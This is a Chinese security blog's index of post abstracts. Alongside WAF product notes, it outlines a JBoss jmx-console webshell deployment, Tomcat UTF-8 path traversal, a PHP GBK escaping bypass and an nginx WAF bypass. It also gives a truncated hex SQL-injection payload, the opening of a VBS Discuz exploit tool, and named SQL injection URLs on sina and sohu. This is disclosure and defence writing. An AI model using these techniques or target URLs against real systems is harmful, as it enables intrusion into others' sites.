随笔分类 -  原创文章

好消息,OpenResty Manager专业版来了,如何免费升级?
摘要:好消息,OpenResty Manager专业版来了,如何免费升级?OpenResty Manager 主机管理面板:专业高效的Web服务器管理解决方案 产品核心优势 ‌OpenResty Manager‌ 是一款现代化、安全、美观的主机管理面板,OpenResty Edge 的开源替代品,它可以让您轻松地安全反向代理在家或互联网上运行的网站,包括访问控制、拒绝服务 阅读全文
posted @ 2025-08-18 17:25 有安科技 阅读(1232) 评论(0) 推荐(0)
JVM CPU占满问题定位
摘要:RASP加载后出现JVM CPU占满问题,jstack -F输出信息无法找到对应占用CPU的线程 perf定位到占用CPU的热代码位于Dependencies::find_finalizable_subclass内查看JVM启动时有-Xnoclassgc 参数,发现jdk8中CMSClassUnlo 阅读全文
posted @ 2018-09-19 11:37 有安科技 阅读(491) 评论(0) 推荐(0)
nginx url解码引发的waf漏洞
摘要:去年发现的ngx一个bug,直到最近有空才写了这篇。Nginx ngx_unescape_uri函数在处理url decode时没有遵照标准的url decode,从而引起一系列使用该函数解码的waf都存在绕过漏洞出现该问题的函数位于src\core\ngx_string.c代码中ngx_unescape_uri(u_char **dst, u_char **src, size_t size, ngx_uint_t type) 1void2ngx_unescape_uri(u_char**dst,u_char**src,size_tsize,ngx_uint_ttype)3{4u_char*d 阅读全文
posted @ 2013-03-28 10:37 有安科技 阅读(46583) 评论(0) 推荐(2)
发个在owasp上演讲web应用防火墙的ppt
摘要:主要介绍了下web应用防火墙的攻与防,有兴趣的可以看看。下载地址:http://files.cnblogs.com/Safe3/web%E5%BA%94%E7%94%A8%E9%98%B2%E7%81%AB%E5%A2%99.pdf 阅读全文
posted @ 2012-06-13 18:30 有安科技 阅读(40703) 评论(0) 推荐(0)
linux程序调试
摘要:strace -f -F -o strace.txt /data1/waf/sbin/nginx -c /data1/waf/conf/nginx.conf如果想让系统在信号中断造成的错误时产生core文件, 我们需要在shell中按如下设置:#设置core大小为无限ulimit -c unlimited#设置文件大小为无限ulimit unlimitedgdb /data1/waf/sbin/nginx core.21169编译nginx程序-g:产生调试工具所用的调试符号信息(如果所编译的程序想要调试就需要加-g),-O, -O2,-O3: 优化编译连接 是执行的更迅速 -O的优化< 阅读全文
posted @ 2012-06-07 17:40 有安科技 阅读(40926) 评论(0) 推荐(0)
Safe3 Web应用防火墙14.1版评测
摘要:四年前的今天,一款名为“Safe3Web应用防火墙”的网站安全防护软件华丽面世,从这时开始国内服务器安防领域开始进入到全新时代。昨天安全伞网络科技公司正式发布了Safe3Web应用防火墙14.1企业版,版本号也由之前的13.X升级为14.1周年预览版。 一般来说如此大幅度的版本升级常常都意味着重大功能的加入,那么这次Safe3Web应用防火墙又会给我们带来哪些惊喜?下面就让我们一同来看一看。软件名称:Safe3Web应用防火墙软件版本:14.1周年版预览版软件大小:4.9M软件授权:试用版适用平台:Win2000Win2003Win2008(32、64位)下载地址:Safe3Web应用防火墙. 阅读全文
posted @ 2011-06-23 14:31 有安科技 阅读(2372) 评论(0) 推荐(0)
lizamoon.com挂马解决办法
摘要:国外安全厂商Websense最近发布警报称,一种名为“丽莎月亮(英文名:LizaMoon)”的SQL注入式黑客攻击正在席卷全球。短短数日内,受攻击的网页数量已迅猛增长到1030000个(截至4月2日10点),外媒报道称其“势如海啸爆发”,就连苹果等知名公司的网站也名列其中。同时,遭到“丽莎月亮”影响的中文网页数量也已达到46800个。几个可疑IP: 95.64.9.18(来自罗马尼亚), 91.217.162.45(来自乌克兰,著名的邪恶网络)网友提供珍贵的IISLog(进行入侵鉴识时,这是超重要的线索)2011-03-11 16:34:45 W3SVC1746246233 *MYSERVE. 阅读全文
posted @ 2011-04-04 16:58 有安科技 阅读(699) 评论(0) 推荐(0)
web安全问题与Safe3 Web应用防火墙
摘要:1如何防止IIS协议漏洞和web漏洞扫描软件的窥探?2如何防止迅雷、Flashget等多线程下载工具下载耗尽网站宝贵的带宽?3我的网站庞大不好管理经常被黑,如何防止sql注入?4我的网站视频图片等资源经常被盗链,如何保护原创的珍贵资料?5我的网站经常被插入垃圾信息甚至挂马XSS,怎么办?6我的网站视频、音乐被人直接下载,如何只允许在线观看?7我的网站被大量恶意CC、DDOS攻击网站打不开,如何阻止... 阅读全文
posted @ 2010-12-01 19:58 有安科技 阅读(1786) 评论(0) 推荐(0)
JBOSS远程代码执行漏洞
摘要:JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图下拉找到如下图所示点击flavor=URL,type=DeploymentScanner进入在输入框中写入war压缩文件webshell的url地址... 阅读全文
posted @ 2010-01-08 16:55 有安科技 阅读(18493) 评论(0) 推荐(0)
cn.daxia123.cn/cn.js挂马完美解决方案
摘要:黑客商业化挂马越来越普遍,用GOOGLE搜索下, 约有844,000个网站被挂马。 最终经过安全伞终于抓到木马原型如下: ;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228 323535292C404320564152434841522832353529204445434C415... 阅读全文
posted @ 2009-01-13 12:48 有安科技
c.nuclear3.c%6F%6D/css/c.js挂马完美解决方案
摘要:最近挂马闹得异常的凶,黑客商业化挂马越来越普遍,用GOOGLE搜索下:/css/c.js>,就知道连hongxiu.com ,msn中国,东方财经网等都被入侵, 约有498,000项,上万个网站被挂马。 木马地址不断变形,但总是http://c.nuclear3.com/这段在不断变化,变种有 ''')Fetch Next From Table_Cursor Into @T,... 阅读全文
posted @ 2008-12-16 18:01 有安科技
看大成天下网站安全
摘要:吴哥,不好意思。今天拿你的网站来看看! 大成天下网址 http://www.unnoo.com/ ,首先看了下首页,感觉还不错,典型的CMS结构。 界面布局感觉有些熟悉,似乎在哪见过。原来用的是CMS Made Simple,官方网址http://www.cmsmadesimple.org/。 既然知道了使用的产品,呵呵,下面到网上搜了下相关漏洞,... 阅读全文
posted @ 2008-09-11 09:53 有安科技
PHP字符编码绕过漏洞总结
摘要:其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。 该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过 addslashes() 转换后 变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,... 阅读全文
posted @ 2008-08-22 14:52 有安科技
Apache Tomcat UTF-8编码漏洞
摘要:呵呵,Apache Tomcat出了一个类似当年IIS url 编码的漏洞。既然CVE已经已经公布了,我也来发一下吧! 漏洞发生在Apache Tomcat处理UTF-8编码时,没有正确转换,从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式,使得可以遍历系统任意文件,包括 /etc/passwd等 触发的条件为Apache Tomcat的配置文件context.xml 或... 阅读全文
posted @ 2008-08-12 09:11 有安科技
discuz获取任意管理员密码漏洞利用工具vbs版
摘要:本打算考虑写个python版的,考虑大家的机器环境还是弄了个vbs版 也利于修改 以下是search.inc.php 文件漏洞利用代码VBS版 Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count 3 Then ShowU() Else strSite=Args(0) strP... 阅读全文
posted @ 2008-08-08 11:26 有安科技
关于MYSQL Injection IDS [ver.1.0]
摘要:哎,这东西貌似写的比较严密。其实绕过的方法有好多种,而且像into outfile这样的最好用into\s+outfile代替 在IIS上大部分的过滤等于零,详细的就不多说了,免得用它的人都遭殃! 阅读全文
posted @ 2008-08-05 09:16 有安科技
sina,网易,搜狐等安全漏洞依然
摘要:下面是一些注入点:希望不要利用这些漏洞干坏事。 sina http://ig.games.sina.com.cn/iframe/iguess_api.php?api_id=4 sina http://mix.sina.com.cn/video/hot_video.php?t=%B2%C6%BE%AD 搜狐 http://club.health.sohu.com/list_elite.php?... 阅读全文
posted @ 2008-05-14 14:46 有安科技 阅读(768) 评论(4) 推荐(0)
招聘网络安全研究工程师
摘要:要求: 对网络安全有深入了解,熟悉各种脚本漏洞,有反汇编破解和漏洞调试能力。至少熟悉一种非windows系统并具备该系统下编程能力。 有发现漏洞经验者优先。 学历:本科 英语:四级 联系方式:东软网络安全部 有意者请将简历发至shizw@neusoft.com,或qq:88952634 阅读全文
posted @ 2008-04-08 10:01 有安科技 阅读(688) 评论(0) 推荐(0)